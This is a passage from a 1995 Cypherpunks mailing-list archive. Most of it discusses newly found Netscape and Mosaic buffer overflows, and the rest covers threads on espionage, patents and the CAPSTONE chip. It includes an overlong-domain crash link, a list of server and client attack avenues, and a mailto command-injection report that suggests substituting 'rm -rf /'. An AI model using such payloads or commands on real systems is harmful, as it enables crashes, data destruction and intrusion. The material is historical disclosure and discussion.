with the return address, and the address happens to be the code.

If you don't believe it can be done, its easy enough to demonstrate it
on your machines, which I believe suffer from the syslog(3) bug, which
your company hasn't patched so far as I know, and which afflicts the
Sendmail daemons you ship with your machines. See the recent 8lgm bug
report if you want details.

> Of course, that also assumes that you can execute from the data area
> which is not always true.

Its usually true on modern machines -- its very difficult to rig
things otherwise given the way that lots of the dynamic loading works
these days.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 21 Sep 95 21:52:19 PDT
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: economic espionage (@#$%^&*) (fwd)
In-Reply-To: <199509220334.WAA02419@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.950922005006.16886A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Sep 1995, Jim Choate wrote:

> 
> Forwarded message:
> 
> > Date: Thu, 21 Sep 1995 22:46:09 -0400 (EDT)
> > From: Black Unicorn <unicorn@polaris.mindport.net>
> > Subject: Re: economic espionage (@#$%^&*)
> > > 
> > > ah yes, just like the way Clinton alone came up with the whole
> > > Clipper idea as a way to balance the legitimate goals
> > > of law enforcement with the right to privacy in society.
> > 
> > Uh, how do you see balancing in the economic intelligence issue?
> > Do you believe espionage is never justified?
> > "Gentlemen don't read each other's mail" almost lost a war.
> > 
> 
> All out espionage should, idealy at least, only take place if there is
> evidence that a nations indipendance is directly involved. By this I mean
> active methods versus passive eavesdropping. It is one thing to send aloft
> satellites to record cellular traffic between cars and quite another to
> actively insert agents provocateur.

Not all agents are agents provocateur.  Human Intelligence is often 
required to determine if the criteria you cite above are present.


> > 
> > 'The White House Office on Science and Technology estimates losses to U.S. 
> > businesses from foreign economic espionage at nearly one hundred billion 
> > dollars per year.'
> > 
> 
> What are its estimates on what US business gains with its present industrial
> espionage infrastructure? Without these numbers the quoted above are
> useless.

The distinction is in the difference between private and government 
sponsored espionage and intelligence.

Most of the French activity is, for example, government sponsored.  As is 
most of the Japanese activity.  U.S. activity is mostly private, by 
corporations and such.

I believe the numbers above are quite helpful really, in identifying 
scope, and demonstrating a need for counterespionage.


> 
>                                                Jim
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 21 Sep 95 22:12:06 PDT
To: perry@piermont.com
Subject: Re: netscape bug
In-Reply-To: <199509220443.AAA02254@frankenstein.piermont.com>
Message-ID: <199509220511.BAA00235@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Maybe I'm missing something here, but I don't see it. While it is easy
to use the "overwrite buffer and stomp on stack" method to execute code
for programs written as so


void foo(char* inputdata)
{
  char blah[X];
  write_to_buffer_without_knowing_length(inputdata, blah);
}

How would you do it for a program rewritten as

void foo(char* intputdata)
{
  char* blah;
  blah=PMalloc(X);
  write_to_buffer_without_knowing_length(inputdata, blah);
}

Where PMalloc acts like malloc, but from a separate heap. Two
other conditions further hold. All variables in this separate heap
are viewed as "tainted" since they came from user input, and can not
be used as arguments to system(), popen(), fopen(), etc.

Given this, I don't see how it is possible to cause code to be executed.
For one thing, you can't modify the stack. Secondly, since buffers
can't be used as arguments for i/o calls, overwriting nearby buffers like
char *program_path = "auxillary_program" to "/bin/csh" won't do you any
good. (note: a pointer variable should never point to data on the stack
anyway. I'm glad Java eliminated stack data. Pointers to stack data 
are the source of numerous bugs in C. There is a minor performance gain
to having the compiler generate the stack allocation rather than
call malloc(), but it's not worth it. Stack data has the benefit that
it is automatically deallocated upon function return. My answer is
to simply use C++ to achieve this with dynamically allocated resources)


I for one, never use scanf(), gets(), or anything that doesn't know the
size of the destination storage. It's plain stupid. I was tutoring
a student today who had allocated a 20-byte buffer on the stack and
used scanf to ask for a filename. Sheesh.

One thing that should set off alarm bells immediately whenever your
coding is a fixed size buffer justified with the idea "no one could
ever use more than Y resources." Yeah, no one could ever use more
than 11 character file names. 640K ram. 32-bit IP address space. etc, etc.
If not for security, then for simple future flexability.


-Ray



   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Sep 95 22:19:47 PDT
To: David Van Wie <dvw@hamachi.epr.com>
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
In-Reply-To: <306216B6@hamachi>
Message-ID: <199509220519.BAA02311@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



David Van Wie writes:
> > Does this mean that prior art would no longer invalidate a patent?
> 
> No.  It just moves the prior art date from the date of invention to the date 
> of filing the patent application.

Can you explain that? It doesn't make much sense...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Sep 95 22:38:08 PDT
To: tomw@cthulhu.engr.sgi.com
Subject: Re: netscape bug
In-Reply-To: <199509220503.WAA05140@orac.engr.sgi.com>
Message-ID: <199509220537.BAA02346@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Tom Weinstein writes:
> > Lets say, Mr. Weinstein, that you shove some code onto the stack along
> > with the return address, and the address happens to be the code.
> 
> I never disputed that it could be done, I was just uncertain as to how
> easy it would be.

Its pretty obvious.

> > If you don't believe it can be done, its easy enough to demonstrate it
> > on your machines, which I believe suffer from the syslog(3) bug, which
> > your company hasn't patched so far as I know, and which afflicts the
> > Sendmail daemons you ship with your machines. See the recent 8lgm bug
> > report if you want details.
> 
> Hmm, could you explain how to exercise this bug?  Perhaps a sample
> program?

I can tell you in general terms -- I don't write MIPS assembler
myself. However, I will point out to you that you use an ancient
Sendmail, and that it uses syslog(3) on user produced data, and that
syslog uses a static buffer. Trick sendmail into logging something
very big, and you can do what you like. The 8lgm people wrote a demo
for Sparc as a proof of concept.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 21 Sep 95 23:12:30 PDT
To: cypherpunks@toad.com
Subject: Another Netscape Bug (and possible security hole)
Message-ID: <199509220612.CAA11441@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



I've found a Netscape bug which I suspect is a buffer overflow and
may have the potential for serious damage. If it is an overflow bug,
then it may be possible to infect every computer which accesses a web
page with Netscape. To see the bug, create an html file containing
the following:

<a href="http://foo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.fo!
 o.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo/foo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.!
 bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo

.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo/foo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.f!
 oo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foofoo.bar.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo> blah </a>

On my BSDI2.0 machine running Netscape 1.1N, this causes a segmentation
fault and subsequent coredump. GDB reports nothing useable (stripped
executable)

As you can see, I just chose an extremely long domain name. I guessed
that the authors of netscape probably thought something like "well,
a buffer size of 256 characters is good enough to hold any domain"

It's definately the domain that's causing it, and not the length of
the URL or the data after the domain name.
 
I also tried to overflow some netscape servers using similar techniques
(and shell metacharacters in all sorts of URLs), to no avail. I suspect
a similar attack may work against the Netscape Server if it is proxying.


Does anyone have a disassembly of Netscape, or more specifically, 
a disassembly of the URL parse and domain lookup routines? I'd be
happy to collaborate and "Hack Netscape" ;-)


Happy Hacking,



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Fri, 22 Sep 95 00:24:28 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <v01510100ac8821ac2b23@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Ray Cromwell writes:
>> I've found a Netscape bug which I suspect is a buffer overflow and
>> may have the potential for serious damage. If it is an overflow bug,
>> then it may be possible to infect every computer which accesses a web
>> page with Netscape. To see the bug, create an html file containing
>> the following:
>
>Oh brother, this is unbelievable !
>
>I'm using Netscape 1.1N under SunOS 4.1.2.
>
>It turns out that the same (or a similar) flaw resides in the Open Location
>input routine -- perhaps this merely coincides with the code called when a
>URL is clicked. Anyway, pasting a URL with an overlong domain name a la
Ray's
>example causes two things:
>
>(1) Part of the Open Location window widget, below the entry box, gets
>overwritten onscreen with a portion of the entered URL.
>
>(2) Netscape crashes with a segmentation fault (no core dump that I can
see).

Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try
it out, I've put up a simple page with the url at

http://www.redweb.com/experiment/bug.html

*warning* view the source before you click on strange links!!!

I don't do PPC assembler, so I can't tell you what happened.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMGJysHIf3YegbdiBAQF/RAJWNVXvLgyPEjVVoGUNoX/AqKlIiT5Axmek
+dCoGJy6CMcP7fq3rB+DAt+SziIaG2X+rUSLt8ih39TBjD1FLAKKsE/VhBHJrp+v
pSoO
=jfLP
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 21 Sep 95 23:26:39 PDT
To: cypherpunks@toad.com
Subject: Netscape bug update
Message-ID: <199509220626.CAB16453@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  I just verified in GDB using a stack trace that the Netscape overflow
bug I mentioned is indeed a static stack buffer overflow. It trashes
the stack.

  What this means is that in theory, it is possible to get a simple
URL, if clicked on, to execute some code on someone's browser.

  Now the hard work begins...


Happy Hacking,
-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 21 Sep 95 23:52:42 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220612.CAA11441@clark.net>
Message-ID: <9509220652.AA06103@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray Cromwell writes:
> I've found a Netscape bug which I suspect is a buffer overflow and
> may have the potential for serious damage. If it is an overflow bug,
> then it may be possible to infect every computer which accesses a web
> page with Netscape. To see the bug, create an html file containing
> the following:

Oh brother, this is unbelievable !

I'm using Netscape 1.1N under SunOS 4.1.2.

It turns out that the same (or a similar) flaw resides in the Open Location
input routine -- perhaps this merely coincides with the code called when a
URL is clicked. Anyway, pasting a URL with an overlong domain name a la Ray's
example causes two things:

(1) Part of the Open Location window widget, below the entry box, gets
overwritten onscreen with a portion of the entered URL.

(2) Netscape crashes with a segmentation fault (no core dump that I can see).

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 00:15:47 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <9509220652.AA06103@cs.umass.edu>
Message-ID: <199509220715.DAA27920@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Ray Cromwell writes:
> > I've found a Netscape bug which I suspect is a buffer overflow and
> > may have the potential for serious damage. If it is an overflow bug,
> > then it may be possible to infect every computer which accesses a web
> > page with Netscape. To see the bug, create an html file containing
> > the following:
> 
> Oh brother, this is unbelievable !
> 
> I'm using Netscape 1.1N under SunOS 4.1.2.
> 
> It turns out that the same (or a similar) flaw resides in the Open Location
> input routine -- perhaps this merely coincides with the code called when a
> URL is clicked. Anyway, pasting a URL with an overlong domain name a la Ray's
> example causes two things:
> 
> (1) Part of the Open Location window widget, below the entry box, gets
> overwritten onscreen with a portion of the entered URL.
> 
> (2) Netscape crashes with a segmentation fault (no core dump that I can see).


 The bug causes random things to happen because it trashes the stack. I
just did a test with http://aaaaaaa.(repeat pattern 42 times, followed by
5 a's), that's 341 characters in the domain. After a coredump, I inspected
the stack, and it has been trashed to hell, including the PC register
which was 0x61616161 (or 'aaaa' in ascii)

THIS IS A SERIOUS BUG!


Unlike the SSL crack (which took a supercomputer to crack), or
the RNG (which doesn't affect many people since there is not much
internet commerce actually going on), this bug has the potential
to damage millions of computers! This is almost enough to scare me
away from using netscape. You can guard yourself by always observing
the URL you are about to click on, but how many people will be
able to keep that up all the time given that Surfing almost
puts many people into a trancelike state?


[I hear Perry in the background groaning and muttering "I told you so"]
These buffer overflow bugs should be taught in every programming
101 course along with fencepost errors.

I'm not even sure if I want to write the obligatory program to exploit
the hack given that some malicious jerk would probably use it
on his home page to attack people.


-Ray






 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 01:01:26 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Mosaic Bug (same as Netscape bug) (was Re: Another Netscape Bug)
In-Reply-To: <43tpv8$rom@tera.mcom.com>
Message-ID: <9509220801.AA06875@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:
>   Not that I want to divert attention away from netscape(OK, maybe I
> do :-) ), but does this bug exist in any other common browser?

Good question.

Here's one answer, obtained using a minor variation on Ray's URL:

----------------------------------------------
Congratulations, you have found a bug in
NCSA Mosaic 2.4 on Sun.

If a core file was generated in your directory,
please run 'dbx Mosaic' (or 'dbx /path/Mosaic' if the
Mosaic executable is not in your current directory)
and then type:
  dbx> where
and mail the results, and a description of what you were doing at the time,
to mosaic-x@ncsa.uiuc.edu.  We thank you for your support.

...exiting NCSA Mosaic now.
----------------------------------------------------

Now, the question is, does Netscape use _the same code_ that was used in
Mosaic for this purpose ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Fri, 22 Sep 95 01:01:44 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: economic espionage (@#$%^&*)
In-Reply-To: <199509220711.AAA02426@ix9.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.950922040156.18568B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995, Bill Stewart wrote:

> 
> >>> >It was said that Pres. Clinton had given a speech while 
> >>> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
> >>> >said in this speech that obtaining  industrial 
> >>> >informations has the highest priority and this were the 
> >>> >new  task for the spies.
> 
> Dr. John Deutsch, speaking to the National Press Club, also mentioned
> economic espionage, with the State Department as a primary
> customer, but was concerned about definitions of goals, etc.
> He did reassure the NPC that the CIA would continue to work with
> drug dealers and corrupt South American military and other scum
> who have information to sell, as well as cooperating more closely 
> with the FBI and DEA, but on the other hand he does apparently
> view domestic operations as clearly outside the CIA's job.
> One set of content in his speech was the planned combination of
> the various satellite data interpretation organizations
> into one group of CIA/Pentagon/NRO/NSA/etc.


It's important here to distinguish economic "espionage" and economic
"intelligence."

Espionage refers to the stealing of secrets with humint, and genrally the
term economic espionage refers to the actual thefts as with the French
government stealing bids, and bag jobbing American businessmen.

Economic Intelligence is much older, and is more about economic analysis
on a macro scale of the target country.

I mention these because the doublespeak can trip up people who aren't
used to what the intelligence types are saying.

John Deutsch is definately an economic intelligence man, but has in past
been quite opposed to economic espionage.


> 
> ObCrypto: One questioner asked him about the growing use
> of encoding and would the CIA be able to keep up eavesdropping on
> people.  "We're very good at eavesdropping" was his main reply;
> he did acknowledge that there was an issue but didn't go into 
> the party line about needing to have escrow to get GAK.
> 
> Clinton, meanwhile, reassured guests at a $1000/plate fundraising 
> lunch that the Republicans' economic plans would mainly affect
> the poor and wouldn't trouble the rich too much...   :-)
> #---
> # Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
> # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
> #---
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 22 Sep 95 04:10:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Project: a standard cell random number generator
In-Reply-To: <9509221037.AA08096@cs.umass.edu>
Message-ID: <199509221110.EAA03110@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> futplex@pseudonym.com (Futplex) writes:
> John Gilmore writes:
> > In this sense, NSA ought to be *encouraging* Intel and
> > IBM and Motorola to put "generate random bits" instructions into
> > their instruction sets...

> Does Tessera include any form of hardware RNG ?

Yes.  Here's a released CAPSTONE spec sheet.  I don't expect an attack like
the one on Netscape to work there.

	Jim Gillogly
	Sterday, 1 Winterfilth S.R. 1995, 11:07

------- Forwarded Message

Date: Fri, 30 Apr 93 10:11:03 EDT
From: Clipper Chip Announcement <clipper@csrc.ncsl.nist.gov>
Organization: National Institute of Standards and Technology (NIST)
Posted-Date: Fri, 30 Apr 93 10:11:03 EDT
Subject: Capstone Chip technology information


                    CAPSTONE CHIP TECHNOLOGY


CAPSTONE is an NSA developed, hardware oriented, cryptographic
device that implements the same cryptographic algorithm as the
CLIPPER chip.  In addition, the CAPSTONE chip includes the
following functions:

     1.   The Digital Signature Algorithm (DSA) proposed by NIST
          as a Federal Information Processing Standard (FIPS);

     2.   The Secure Hashing Algorithm (SHA) recently approved as
          FIPS 180;

     3.   A Key Exchange Algorithm based on a public key
          exchange;

     4.   A general purpose exponentiation algorithm;

     5.   A general purpose, random number generator which uses a
          pure noise source.

The Key exchange Algorithm is programmable on the chip and uses
functions 1-2 and 4-5 above.

Prototypes of the CAPSTONE chip are due the last week in April. 
The chips are expected to sell for $85.00 each (programmed).

The first CAPSTONE chips are to be installed in PCMCIA electronic
boards and used for the PMSP program for the security of the
Defense Messaging System.

The CAPSTONE chip is big, complex and powerful.  Over 850
megabytes are required by the automated design system to define
the functions of the chip.  VLSI Technology is fabricating the
chip, and MYKOTRONX is designing and testing the chip.
                                

1.   What are the power requirements of the CAPSTONE chip?  Will
     they fit the power requirements of battery-operated, hand
     held devices?

     The CAPSTONE chip requires a 5 volt DC voltage source. 
     Power ratings are currently estimated at 3.5 milliamps per
     MHz, i.e. at 10 Mhz and 5 volt DC, power consumed is 175
     milliwatts.  These estimates will be refined as data are
     taken into the actual chips.  In comparison, the CLIPPER
     chip consumes approximately 150 milliwatts at 5 volts DC and
     10 MHz.  As you can see, both chips fall within the power
     requirements of hand held, battery-operated devices.

2.   Will the CAPSTONE chip incorporate the key escrow features
     of the CLIPPER chip?

     Yes, it will.

3.   When will CAPSTONE be announced and available?

     Prototypes of the CAPSTONE chip are due the end of this
     month.  We ask that you contact the manufacturer, Mykotronx
     Inc., for further information concerning the timetable for
     availability of CAPSTONE.

4.   Is the Department of Defense working now to incorporate
     CAPSTONE in the Pre-message Security Protocol?

     Yes

5.   Will CAPSTONE meet the design requirements of a PCMCIA card
     that combines voice and/or data communications with
     encryption capabilities?

     Yes

6.   Will CAPSTONE use the Digital Signature Standard?  What kind
     of key management scheme will be employed in the CAPSTONE
     chip?  Will CAPSTONE allow the use of RSA public-key
     encryption in conjunction with, or as an alternative to, the
     DSS?  If RSA is implemented on the CAPSTONE chip, will the
     key escrow feature function?

     CAPSTONE implements the Digital Signature Algorithm (DSA),
     proposed by NIST as a Federal Information Processing
     Standard (FIPS), to perform the digital signature functions. 
     Key management is handled by an algorithm based on a public-
     key exchange technique.  The CAPSTONE chip does not
     implement RSA.


4/30/93



------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 01:14:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509220715.DAA27920@clark.net>
Message-ID: <9509220814.AA06967@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


On the bright side, mailto: hyperlinks containing extra-long domain names
seem to be handled comparatively safely in both Netscape and Mosaic. 
(Perhaps they just have longer buffers ? ;)

Neither Netscape nor Mosaic crashes on a mailto:// of the same length as a
ftp:// or http:// that _would_ crash them. Netscape appears to do some sort
of truncation at some point (silently); Mosaic gives you a standard "server
is not accessible or is refusing to serve the document" warning page.

(Netscape 1.1N, Mosaic 2.4, SunOS 4.1.2)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 01:20:30 PDT
To: cypherpunks@toad.com
Subject: Netscape Server Attacks
Message-ID: <199509220820.EAA12405@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



No, calmdown,  I haven't found a hole in the server yet, but if you
want to win some T-Shirts, here's some potential avenues to try. I've
been messing with these, and maybe some other c'punk can find
one that will work.

1) buffer overflow attacks in the HTTP request header

Example: The HTTP/1.0 full request has an "If-Modified-Since" header
which takes a date string. If Netscape assumes this string is not going
to be longer than a certain width....
Look for ways to attack the HTTP request headers. See
http://www.w3.org/pub/WWW/Protocols/HTTP1.0/draft-ietf-http-spec.html

CGI attacks
2)Shell metacharacters, or extremely long paths, may lead the way to
executing arbitrary shell commands on the server.
3) Overflow the URL in a CGI GET by using too many form variables in
the response. 


Server attacking client
4) use the Location: redirection header to send a long domain
5) use Location: redirection or Refresh: to load up file:localfile
   You can force the browser to load up any arbitrary file the user
   has access to local to his client
  Example:     Refresh: 1 file:config.sys

6) send back a page with an EXTREME number of Motif HTML FORM widgets
in a <FORM>. E.g. send back 10,000 radio buttons.


Happy Hunting,
-Ray



   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 22 Sep 95 01:27:11 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Patents and trade secrets was: Encryption algorithms used in PrivaSoft
In-Reply-To: <199509220519.BAA02311@frankenstein.piermont.com>
Message-ID: <9509220827.AA07056@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Van Wie writes:
> It just moves the prior art date from the date of invention to the date 
> of filing the patent application.

.pm writes:
> Can you explain that? It doesn't make much sense...

I'll ask a more specific question:

What happens if the chronology goes like this ?

(0) Alice invents a snaffleblort.
(1) Bob invents a snaffleblort.
(2) Bob files for a patent on a snaffleblort.

From what you said, it would appear that Alice's prior art won't count when
it comes to considering the validity of Bob's patent claim. Is that correct ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 01:30:13 PDT
To: cypherpunks@toad.com
Subject: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <9509220814.AA06967@cs.umass.edu>
Message-ID: <199509220830.EAA13828@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On the bright side, mailto: hyperlinks containing extra-long domain names
> seem to be handled comparatively safely in both Netscape and Mosaic. 
> (Perhaps they just have longer buffers ? ;)

  Good question. My guess is, Netscape doesn't do any processing on the
mailto: hyperlink at all, but merely passes it to a real mail delivery
agent like Sendmail (or it uses MAPI under Win'95). Which begs
the question, if Netscape is executing an external delivery agent,
there may be the possiblity of sneaking an attack in there and getting
the shell to execute something.

Hmm, let me try something.


WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered
this before! Try a page with the following URL

 test 

Muahaha! Yet another security hole! Clicking on this mailto brings up
an xterm on my machine!  Simply change the xterm& to "rm -rf /" and
bingo!


Sheesh. I better stop before I am on Netscape's most hated list.


-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 22 Sep 95 01:37:09 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <199509220830.EAA13828@clark.net>
Message-ID: <199509220836.EAA14476@clark.net>
MIME-Version: 1.0
